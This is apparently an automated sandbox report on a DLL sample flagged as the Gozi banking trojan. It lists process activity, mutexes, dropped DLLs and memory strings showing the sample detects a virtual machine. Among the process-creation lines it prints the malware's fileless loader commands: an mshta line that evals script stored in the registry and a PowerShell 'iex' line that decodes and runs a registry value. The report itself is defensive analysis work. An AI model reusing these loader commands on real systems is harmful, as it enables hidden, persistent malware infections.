Source: C:\Windows\System32\control.exe	Code function: 35_2_007F8DD0	35_2_007F8DD0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00807D44	35_2_00807D44
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E5DA8	35_2_007E5DA8
Source: C:\Windows\System32\control.exe	Code function: 35_2_007F25A4	35_2_007F25A4
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080C560	35_2_0080C560
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E1600	35_2_007E1600
Source: C:\Windows\System32\control.exe	Code function: 35_2_00810614	35_2_00810614
Source: C:\Windows\System32\control.exe	Code function: 35_2_007E96D8	35_2_007E96D8
Source: C:\Windows\System32\control.exe	Code function: 35_2_007FCE90	35_2_007FCE90
Source: C:\Windows\System32\control.exe	Code function: 35_2_007EDF58	35_2_007EDF58
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F94B78	37_2_0000029741F94B78
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F95428	37_2_0000029741F95428
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F7596C	37_2_0000029741F7596C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F8D92C	37_2_0000029741F8D92C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F8A0F0	37_2_0000029741F8A0F0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9A074	37_2_0000029741F9A074
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F89850	37_2_0000029741F89850
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F8782C	37_2_0000029741F8782C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F8B814	37_2_0000029741F8B814
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9A3B2	37_2_0000029741F9A3B2
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F8B378	37_2_0000029741F8B378
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F77B44	37_2_0000029741F77B44
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F86B00	37_2_0000029741F86B00
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741FA027C	37_2_0000029741FA027C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F96250	37_2_0000029741F96250
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9EA40	37_2_0000029741F9EA40
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F7DA3C	37_2_0000029741F7DA3C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F8AA28	37_2_0000029741F8AA28
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F72A34	37_2_0000029741F72A34
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F79A34	37_2_0000029741F79A34
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9E220	37_2_0000029741F9E220
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F87218	37_2_0000029741F87218
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F899F8	37_2_0000029741F899F8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F919FC	37_2_0000029741F919FC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9A9FC	37_2_0000029741F9A9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F7B9E8	37_2_0000029741F7B9E8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F769DC	37_2_0000029741F769DC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F749C4	37_2_0000029741F749C4
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F75DA8	37_2_0000029741F75DA8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F825A4	37_2_0000029741F825A4
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9C560	37_2_0000029741F9C560
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F97D44	37_2_0000029741F97D44
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F86528	37_2_0000029741F86528
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F7ECE0	37_2_0000029741F7ECE0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F7FCA0	37_2_0000029741F7FCA0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F81C0C	37_2_0000029741F81C0C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F993FC	37_2_0000029741F993FC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F903EC	37_2_0000029741F903EC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F7DF58	37_2_0000029741F7DF58
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F796D8	37_2_0000029741F796D8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F8CE90	37_2_0000029741F8CE90
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741FA0614	37_2_0000029741FA0614
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F71600	37_2_0000029741F71600
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F765D8	37_2_0000029741F765D8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F875D8	37_2_0000029741F875D8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F88DD0	37_2_0000029741F88DD0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741FB138C	37_2_0000029741FB138C

PE file does not import any functions

Source: 1dcawf3x.dll.32.dr	Static PE information: No import functions for PE file found
Source: b5r2gs3w.dll.28.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe	Section loaded: msoert2.dll
Source: C:\Windows\explorer.exe	Section loaded: msimg32.dll

Source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{A677FE71-CD2A-C8CD-873A-517CAB0E1570}
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{96227181-FD78-38E6-372A-81EC5BFE45E0}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5212:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4653F7A7-ED11-684A-A7DA-711CCBAE3510}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{722097F0-2905-748C-43C6-6DE8275AF19C}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\fo.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:82954 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17428 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8A0A.tmp' 'c:\Users\user\AppData\Local\Temp\b5r2gs3w\CSCC26898CFCBA4739B5B18589DB58EA5A.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES97F5.tmp' 'c:\Users\user\AppData\Local\Temp\1dcawf3x\CSCA42BA027116C433D856471BB95F3A1F.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:82954 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17428 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8A0A.tmp' 'c:\Users\user\AppData\Local\Temp\b5r2gs3w\CSCC26898CFCBA4739B5B18589DB58EA5A.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES97F5.tmp' 'c:\Users\user\AppData\Local\Temp\1dcawf3x\CSCA42BA027116C433D856471BB95F3A1F.TMP'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001C.00000002.340774846.0000016303490000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.351880338.000001B738AA0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000022.00000000.370529498.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.361197992.0000000004BA0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.361197992.0000000004BA0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000023.00000002.381324116.00000264C084C000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000023.00000002.381324116.00000264C084C000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000022.00000000.370529498.0000000006560000.00000002.00000001.sdmp

Source: fo.dll	Static PE information: section name: .code
Source: fo.dll	Static PE information: section name: .rdatai

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03147177 push ecx; ret	0_2_03147187
Source: C:\Windows\System32\control.exe	Code function: 35_2_0080C131 push 3B000001h; retf	35_2_0080C136
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000029741F9C131 push 3B000001h; retf	37_2_0000029741F9C136

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.dll			Jump to dropped file

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3441			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5324			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.dll			Jump to dropped file

Source: RuntimeBroker.exe, 00000027.00000002.576219251.0000017764240000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}App
Source: explorer.exe, 00000022.00000000.373438920.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
